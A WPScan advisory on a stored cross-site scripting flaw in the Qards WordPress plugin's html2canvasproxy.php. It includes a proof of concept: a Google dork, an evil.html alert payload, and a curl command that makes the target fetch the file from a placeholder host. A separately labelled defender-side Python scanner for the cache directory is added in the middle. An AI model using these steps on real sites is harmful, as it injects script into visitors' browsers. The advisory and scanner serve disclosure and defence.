Qards - Stored Cross-Site Scripting (XSS)


Description
Google Dork: inurl:"plugins/qards"

Qards provides you easy option to drag and edit every part and element of your site in the front-end, you will never have to write any code to change the layout or to change any part of the site like the traditional WordPress way.
Proof of Concept
The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
takes the value of the "url" parameter and, using PHP cURL functions, saves the fetched website's content to a file in /wp-content/plugins/qards/images/ with a filename formatted as follows:

<hash md5>.<mime-type>

On a web server with "Directory Listing" enabled, that file is easy to find.
Due to improper sanitization, the generated file suffers from a persistent XSS vulnerability.

POC:
1. Create a remote file (evil.html) on your web server with the following content:

<script> alert('XSS'); </script>

2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html'

3. Browse to http://target/wp-content/plugins/qards/images/ to get the file
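A defender-side check, added here as an example and not code from the advisory or from the Qards plugin: it walks the proxy's cache directory and flags cache-named files whose content is not an image, which is what an image proxy should ever have stored. The magic-byte table, the `<md5>.<suffix>` filename pattern and the sample files are assumptions.

```python
# Added example: find non-image content cached by html2canvasproxy.php.
import os
import re
import tempfile

# Assumption: these are the only formats an image proxy should persist.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")
# Assumption: the proxy names files <md5>.<suffix>, as the advisory describes.
CACHE_NAME = re.compile(r"^[0-9a-f]{32}\.[A-Za-z0-9./+-]+$")
HTML_MARKER = re.compile(rb"<\s*(script|html|iframe|svg)\b", re.IGNORECASE)


def classify(data: bytes) -> str:
    """'image' on a known image magic, 'active-content' on HTML/script markup, else 'unknown'."""
    if data.startswith(IMAGE_MAGIC):
        return "image"
    if HTML_MARKER.search(data[:4096]):
        return "active-content"
    return "unknown"


def scan_cache_dir(path: str) -> list[tuple[str, str]]:
    """Return (filename, verdict) for every cache-named file that is not an image."""
    findings = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not CACHE_NAME.match(name) or not os.path.isfile(full):
            continue  # plugin files such as index.php are not proxy output
        with open(full, "rb") as fh:
            verdict = classify(fh.read(4096))  # magic bytes sit at the start
        if verdict != "image":
            findings.append((name, verdict))
    return findings


def demo() -> list[tuple[str, str]]:
    """Constructed cache directory: one PNG header, one HTML file, one plugin file."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "0" * 32 + ".png"), "wb") as fh:  # constructed name
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    with open(os.path.join(d, "1" * 32 + ".html"), "wb") as fh:  # constructed name
        fh.write(b"<html><body><script>alert('XSS');</script></body></html>")
    with open(os.path.join(d, "index.php"), "wb") as fh:
        fh.write(b"<?php // not proxy output, skipped by the name filter\n")
    return scan_cache_dir(d)


if __name__ == "__main__":
    for name, verdict in demo():
        print(f"{name}: {verdict}")
```

Running it on the real images/ directory (with `scan_cache_dir`) lists every cached file that should be removed and, if the proxy stays installed, restricted to image MIME types.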


References

URL https://designmodo.com/qards/
URL https://www.youtube.com/watch?v=RRt_PUUnVhg
URL https://github.com/brcontainer/html2canvas-php-proxy/issues/27

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter theMiddle
Submitter Twitter https://twitter.com/Menin_TheMiddle
Verified No
WPVDB ID 8934

Timeline

Publicly Published 2017-10-11 (about 1 month ago)
Added 2017-10-17 (about 1 month ago)
Last Updated 2017-10-17 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.